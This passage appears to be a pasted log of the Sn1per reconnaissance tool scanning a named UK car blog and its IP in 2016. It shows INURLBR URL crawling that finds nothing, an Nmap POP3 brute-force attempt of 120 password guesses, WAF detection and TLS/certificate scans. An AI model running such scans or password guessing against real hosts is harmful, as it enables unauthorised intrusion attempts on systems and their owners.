  2932. |_[ + ] [ 77 / 100 ]-[11:56:29] [ - ]
  2933. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/05/30/pride-and-prejudice-why-we-choose-the-cars-we-drive/ ]
  2934. |_[ + ] Exploit::
  2935. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2936. |_[ + ] More details:: / - / , ISP:
  2937. |_[ + ] Found:: UNIDENTIFIED
  2938.  
  2939. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2940. |_[ + ] [ 78 / 100 ]-[11:56:30] [ - ]
  2941. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/10/03/the-curious-case-of-the-customer-that-couldnt-be-pleased/ ]
  2942. |_[ + ] Exploit::
  2943. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2944. |_[ + ] More details:: / - / , ISP:
  2945. |_[ + ] Found:: UNIDENTIFIED
  2946.  
  2947. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2948. |_[ + ] [ 79 / 100 ]-[11:56:32] [ - ]
  2949. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/08/04/car-of-the-year-the-jokes-not-on-skoda-anymore/ ]
  2950. |_[ + ] Exploit::
  2951. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2952. |_[ + ] More details:: / - / , ISP:
  2953. |_[ + ] Found:: UNIDENTIFIED
  2954.  
  2955. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2956. |_[ + ] [ 80 / 100 ]-[11:56:33] [ - ]
  2957. |_[ + ] Target:: [ http://thegarageblog.co.uk/2015/07/29/treat-your-car-to-a-terraclean-treatment-and-feel-the-benefits/ ]
  2958. |_[ + ] Exploit::
  2959. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2960. |_[ + ] More details:: / - / , ISP:
  2961. |_[ + ] Found:: UNIDENTIFIED
  2962.  
  2963. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2964. |_[ + ] [ 81 / 100 ]-[11:56:34] [ - ]
  2965. |_[ + ] Target:: [ http://thegarageblog.co.uk/2011/07/10/the-1500-minimum-px-rip-off-and-how-to-avoid-it/ ]
  2966. |_[ + ] Exploit::
  2967. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2968. |_[ + ] More details:: / - / , ISP:
  2969. |_[ + ] Found:: UNIDENTIFIED
  2970.  
  2971. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2972. |_[ + ] [ 82 / 100 ]-[11:56:36] [ - ]
  2973. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/10/06/youre-not-the-first-and-you-sure-wont-be-the-last/ ]
  2974. |_[ + ] Exploit::
  2975. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2976. |_[ + ] More details:: / - / , ISP:
  2977. |_[ + ] Found:: UNIDENTIFIED
  2978.  
  2979. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2980. |_[ + ] [ 83 / 100 ]-[11:56:37] [ - ]
  2981. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/02/13/more-changes-to-the-mot-test-but-frequency-stays-the-same/ ]
  2982. |_[ + ] Exploit::
  2983. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2984. |_[ + ] More details:: / - / , ISP:
  2985. |_[ + ] Found:: UNIDENTIFIED
  2986.  
  2987. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2988. |_[ + ] [ 84 / 100 ]-[11:56:39] [ - ]
  2989. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/11/25/when-diy-can-spell-divorce-the-battle-of-the-sexes-continues/ ]
  2990. |_[ + ] Exploit::
  2991. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  2992. |_[ + ] More details:: / - / , ISP:
  2993. |_[ + ] Found:: UNIDENTIFIED
  2994.  
  2995. _[ - ]::--------------------------------------------------------------------------------------------------------------
  2996. |_[ + ] [ 85 / 100 ]-[11:56:40] [ - ]
  2997. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/03/02/hold-your-horses-why-im-a-sucker-for-a-red-i/ ]
  2998. |_[ + ] Exploit::
  2999. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3000. |_[ + ] More details:: / - / , ISP:
  3001. |_[ + ] Found:: UNIDENTIFIED
  3002.  
  3003. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3004. |_[ + ] [ 86 / 100 ]-[11:56:41] [ - ]
  3005. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/03/11/leopards-and-taigas-kentons-and-yamazukis-–-the-world-on-2-wheels/ ]
  3006. |_[ + ] Exploit::
  3007. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3008. |_[ + ] More details:: / - / , ISP:
  3009. |_[ + ] Found:: UNIDENTIFIED
  3010.  
  3011. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3012. |_[ + ] [ 87 / 100 ]-[11:56:43] [ - ]
  3013. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/09/03/a-post-paraguay-post-back-to-the-nanny-state-of-the-uk/ ]
  3014. |_[ + ] Exploit::
  3015. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3016. |_[ + ] More details:: / - / , ISP:
  3017. |_[ + ] Found:: UNIDENTIFIED
  3018.  
  3019. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3020. |_[ + ] [ 88 / 100 ]-[11:56:44] [ - ]
  3021. |_[ + ] Target:: [ http://thegarageblog.co.uk/2016/01/28/an-enlightening-case-of-how-a-correct-diagnosis-can-save-a-fortune/ ]
  3022. |_[ + ] Exploit::
  3023. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3024. |_[ + ] More details:: / - / , ISP:
  3025. |_[ + ] Found:: UNIDENTIFIED
  3026.  
  3027. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3028. |_[ + ] [ 89 / 100 ]-[11:56:46] [ - ]
  3029. |_[ + ] Target:: [ http://thegarageblog.co.uk/2012/02/28/choosing-a-reliable-car-you-can-trust-guest-article-from-epiphany-solutions/ ]
  3030. |_[ + ] Exploit::
  3031. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3032. |_[ + ] More details:: / - / , ISP:
  3033. |_[ + ] Found:: UNIDENTIFIED
  3034.  
  3035. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3036. |_[ + ] [ 90 / 100 ]-[11:56:47] [ - ]
  3037. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/02/16/when-technology-leaves-me-cold-are-cars-becoming-too-complicated-to-enjoy/ ]
  3038. |_[ + ] Exploit::
  3039. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3040. |_[ + ] More details:: / - / , ISP:
  3041. |_[ + ] Found:: UNIDENTIFIED
  3042.  
  3043. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3044. |_[ + ] [ 91 / 100 ]-[11:56:49] [ - ]
  3045. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/09/30/a-bad-design-from-the-manufacturer-but-youre-left-paying-the-price/ ]
  3046. |_[ + ] Exploit::
  3047. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3048. |_[ + ] More details:: / - / , ISP:
  3049. |_[ + ] Found:: UNIDENTIFIED
  3050.  
  3051. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3052. |_[ + ] [ 92 / 100 ]-[11:56:50] [ - ]
  3053. |_[ + ] Target:: [ http://thegarageblog.co.uk/2014/01/12/its-ok-ive-got-a-warranty-words-you-should-never-rely-on/ ]
  3054. |_[ + ] Exploit::
  3055. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3056. |_[ + ] More details:: / - / , ISP:
  3057. |_[ + ] Found:: UNIDENTIFIED
  3058.  
  3059. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3060. |_[ + ] [ 93 / 100 ]-[11:56:52] [ - ]
  3061. |_[ + ] Target:: [ http://thegarageblog.co.uk/2014/06/26/nocturnal-arrivals-at-the-workshop-cars-that-go-wrong-in-the-night/ ]
  3062. |_[ + ] Exploit::
  3063. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3064. |_[ + ] More details:: / - / , ISP:
  3065. |_[ + ] Found:: UNIDENTIFIED
  3066.  
  3067. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3068. |_[ + ] [ 94 / 100 ]-[11:56:53] [ - ]
  3069. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/06/24/how-broke-must-it-be-just-wake-up-and-smell-the-coffee/ ]
  3070. |_[ + ] Exploit::
  3071. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3072. |_[ + ] More details:: / - / , ISP:
  3073. |_[ + ] Found:: UNIDENTIFIED
  3074.  
  3075. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3076. |_[ + ] [ 95 / 100 ]-[11:56:55] [ - ]
  3077. |_[ + ] Target:: [ http://thegarageblog.co.uk/2008/12/23/27-for-a-light-bulb-well-you-do-get-6-for-your-money/ ]
  3078. |_[ + ] Exploit::
  3079. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3080. |_[ + ] More details:: / - / , ISP:
  3081. |_[ + ] Found:: UNIDENTIFIED
  3082.  
  3083. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3084. |_[ + ] [ 96 / 100 ]-[11:56:56] [ - ]
  3085. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/10/07/guest-post-what-are-the-tips-to-avoid-a-boring-journey-by-car/ ]
  3086. |_[ + ] Exploit::
  3087. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3088. |_[ + ] More details:: / - / , ISP:
  3089. |_[ + ] Found:: UNIDENTIFIED
  3090.  
  3091. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3092. |_[ + ] [ 97 / 100 ]-[11:56:57] [ - ]
  3093. |_[ + ] Target:: [ http://thegarageblog.co.uk/2010/07/22/misfuelling-is-on-the-rise-dont-get-ripped-off-for-a-diesel-accident/ ]
  3094. |_[ + ] Exploit::
  3095. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3096. |_[ + ] More details:: / - / , ISP:
  3097. |_[ + ] Found:: UNIDENTIFIED
  3098.  
  3099. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3100. |_[ + ] [ 98 / 100 ]-[11:56:59] [ - ]
  3101. |_[ + ] Target:: [ http://thegarageblog.co.uk/2009/10/22/think-of-a-price-then-double-it-the-truth-beind-garage-repair-costs/ ]
  3102. |_[ + ] Exploit::
  3103. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3104. |_[ + ] More details:: / - / , ISP:
  3105. |_[ + ] Found:: UNIDENTIFIED
  3106.  
  3107. _[ - ]::--------------------------------------------------------------------------------------------------------------
  3108. |_[ + ] [ 99 / 100 ]-[11:57:00] [ - ]
  3109. |_[ + ] Target:: [ http://thegarageblog.co.uk/2013/04/03/the-horsemeat-scandal-continues-why-cut-price-servicing-may-have-hidden-nasties-too/ ]
  3110. |_[ + ] Exploit::
  3111. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx/1.10.1 , IP:192.254.237.91:80
  3112. |_[ + ] More details:: / - / , ISP:
  3113. |_[ + ] Found:: UNIDENTIFIED
  3114.  
  3115. [ INFO ] [ Shutting down ]
  3116. [ INFO ] [ End of process INURLBR at [11-07-2016 11:57:00]
  3117. [ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
  3118. [ INFO ] [ OUTPUT FILE ]:: [ /root/Sn1per/output/loot/inurlbr-thegarageblog.co.uk.txt ]
  3119. |_________________________________________________________________________________________
  3120.  
  3121. \_________________________________________________________________________________________/
  3122.  
  3123. + -- --=[Port 110 opened... running tests...
  3124.  
  3125. Starting Nmap 7.12SVN ( https://nmap.org ) at 2016-07-11 11:57 EEST
  3126. Nmap scan report for thegarageblog.co.uk (192.254.237.91)
  3127. Host is up (0.23s latency).
  3128. PORT STATE SERVICE VERSION
  3129. 110/tcp open pop3 Dovecot pop3d
  3130. | pop3-brute:
  3131. | Accounts: No valid accounts found
  3132. |_ Statistics: Performed 120 guesses in 184 seconds, average tps: 0
  3133. |_pop3-capabilities: AUTH-RESP-CODE PIPELINING USER SASL(PLAIN LOGIN) RESP-CODES CAPA UIDL TOP STLS
  3134.  
  3135. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3136. Nmap done: 1 IP address (1 host up) scanned in 185.83 seconds
  3137. + -- --=[Port 111 closed... skipping.
  3138. + -- --=[Port 135 closed... skipping.
  3139. + -- --=[Port 139 closed... skipping.
  3140. + -- --=[Port 162 closed... skipping.
  3141. + -- --=[Port 389 closed... skipping.
  3142. + -- --=[Port 443 opened... running tests...
  3143. ################################### Checking for WAF ##############################
  3144.  
  3145. ^ ^
  3146. _ __ _ ____ _ __ _ _ ____
  3147. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  3148. | V V // o // _/ | V V // 0 // 0 // _/
  3149. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  3150. <
  3151. ...'
  3152.  
  3153. WAFW00F - Web Application Firewall Detection Tool
  3154.  
  3155. By Sandro Gauci && Wendel G. Henrique
  3156.  
  3157. Checking https://thegarageblog.co.uk
  3158. The site https://thegarageblog.co.uk is behind a ModSecurity (OWASP CRS)
  3159. Number of requests: 11
  3160.  
  3161. ################################### Gathering HTTP Info ###########################
  3162. ./whatweb: /usr/lib/ruby/vendor_ruby/rchardet/universaldetector.rb:39: invalid multibyte escape: /[\x80-\xFF]/ (SyntaxError)
  3163.  
  3164. ################################### Gathering SSL/TLS Info ########################
  3165. Version: 1.11.7-static
  3166. OpenSSL 1.0.2i-dev xx XXX xxxx
  3167.  
  3168. Testing SSL server thegarageblog.co.uk on port 443
  3169.  
  3170. TLS Fallback SCSV:
  3171. Server supports TLS Fallback SCSV
  3172.  
  3173. TLS renegotiation:
  3174. Secure session renegotiation supported
  3175.  
  3176. TLS Compression:
  3177. Compression disabled
  3178.  
  3179. Heartbleed:
  3180. TLS 1.2 not vulnerable to heartbleed
  3181. TLS 1.1 not vulnerable to heartbleed
  3182. TLS 1.0 not vulnerable to heartbleed
  3183.  
  3184. Supported Server Cipher(s):
  3185. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
  3186. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
  3187. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
  3188. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
  3189. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
  3190. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
  3191. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
  3192. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
  3193. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3194. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3195. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3196. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3197. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3198. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3199. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3200. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3201. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
  3202. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
  3203. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
  3204. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
  3205.  
  3206. SSL Certificate:
  3207. Signature Algorithm: sha256WithRSAEncryption
  3208. RSA Key Strength: 2048
  3209.  
  3210. Subject: *.hostgator.com
  3211. Altnames: DNS:*.hostgator.com, DNS:hostgator.com
  3212. Issuer: COMODO RSA Domain Validation Secure Server CA
  3213.  
  3214. Not valid before: Oct 16 00:00:00 2015 GMT
  3215. Not valid after: Oct 15 23:59:59 2018 GMT
  3216.  
  3217.  
  3218.  
  3219. AVAILABLE PLUGINS
  3220. -----------------
  3221.  
  3222. PluginCertInfo
  3223. PluginOpenSSLCipherSuites
  3224. PluginChromeSha1Deprecation
  3225. PluginHSTS
  3226. PluginSessionResumption
  3227. PluginHeartbleed
  3228. PluginCompression
  3229. PluginSessionRenegotiation
  3230.  
  3231.  
  3232.  
  3233. CHECKING HOST(S) AVAILABILITY
  3234. -----------------------------
  3235.  
  3236. thegarageblog.co.uk:443 => 192.254.237.91:443
  3237.  
  3238.  
  3239.  
  3240. SCAN RESULTS FOR THEGARAGEBLOG.CO.UK:443 - 192.254.237.91:443
  3241. -------------------------------------------------------------
  3242.  
  3243. * Deflate Compression:
  3244. OK - Compression disabled
  3245.  
  3246. * Session Renegotiation:
  3247. Client-initiated Renegotiations: OK - Rejected
  3248. Secure Renegotiation: OK - Supported
  3249.  
  3250. * Certificate - Content:
  3251. SHA1 Fingerprint: 9141b50cee603888dc45f4f285c1c8844fe12221
  3252. Common Name: *.hostgator.com
  3253. Issuer: COMODO RSA Domain Validation Secure Server CA
  3254. Serial Number: 19607DA086E8A7FE72900982CFED93BF
  3255. Not Before: Oct 16 00:00:00 2015 GMT
  3256. Not After: Oct 15 23:59:59 2018 GMT
  3257. Signature Algorithm: sha256WithRSAEncryption
  3258. Public Key Algorithm: rsaEncryption
  3259. Key Size: 2048 bit
  3260. Exponent: 65537 (0x10001)
  3261. X509v3 Subject Alternative Name: {'DNS': ['*.hostgator.com', 'hostgator.com']}
  3262.  
  3263. * Certificate - Trust:
  3264. Hostname Validation: FAILED - Certificate does NOT match thegarageblog.co.uk
  3265. Google CA Store (09/2015): OK - Certificate is trusted
  3266. Java 6 CA Store (Update 65): OK - Certificate is trusted
  3267. Microsoft CA Store (09/2015): OK - Certificate is trusted
  3268. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  3269. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  3270. Certificate Chain Received: ['*.hostgator.com', 'COMODO RSA Domain Validation Secure Server CA', 'COMODO RSA Certification Authority']
  3271.  
  3272. * Certificate - OCSP Stapling:
  3273. NOT SUPPORTED - Server did not send back an OCSP response.
  3274.  
  3275. * Session Resumption:
  3276. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
  3277. With TLS Session Tickets: OK - Supported
  3278.  
  3279. * SSLV2 Cipher Suites:
  3280. Server rejected all cipher suites.
  3281.  
  3282. * SSLV3 Cipher Suites:
  3283. Undefined - An unexpected error happened:
  3284. PSK-3DES-EDE-CBC-SHA error - [Errno 111] Connection refused
  3285. NULL-SHA256 error - [Errno 111] Connection refused
  3286. NULL-SHA error - [Errno 111] Connection refused
  3287. NULL-MD5 error - [Errno 111] Connection refused
  3288. EXP-RC4-MD5 error - [Errno 111] Connection refused
  3289. EXP-RC2-CBC-MD5 error - [Errno 111] Connection refused
  3290. EXP-EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  3291. EXP-EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  3292. EXP-DES-CBC-SHA error - [Errno 111] Connection refused
  3293. EXP-ADH-RC4-MD5 error - [Errno 111] Connection refused
  3294. EXP-ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  3295. EDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  3296. EDH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  3297. EDH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
  3298. EDH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  3299. ECDHE-RSA-NULL-SHA error - [Errno 111] Connection refused
  3300. ECDHE-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  3301. ECDH-RSA-NULL-SHA error - [Errno 111] Connection refused
  3302. ECDH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  3303. ECDH-ECDSA-NULL-SHA error - [Errno 111] Connection refused
  3304. ECDH-ECDSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  3305. DH-RSA-DES-CBC3-SHA error - [Errno 111] Connection refused
  3306. DH-RSA-DES-CBC-SHA error - [Errno 111] Connection refused
  3307. DH-DSS-DES-CBC3-SHA error - [Errno 111] Connection refused
  3308. DH-DSS-DES-CBC-SHA error - [Errno 111] Connection refused
  3309. DES-CBC3-SHA error - [Errno 111] Connection refused
  3310. DES-CBC-SHA error - [Errno 111] Connection refused
  3311. AECDH-NULL-SHA error - [Errno 111] Connection refused
  3312. AECDH-DES-CBC3-SHA error - [Errno 111] Connection refused
  3313. ADH-DES-CBC3-SHA error - [Errno 111] Connection refused
  3314. ADH-DES-CBC-SHA error - [Errno 111] Connection refused
  3315.  
  3316.  
  3317.  
  3318. SCAN COMPLETED IN 15.61 S
  3319. -------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement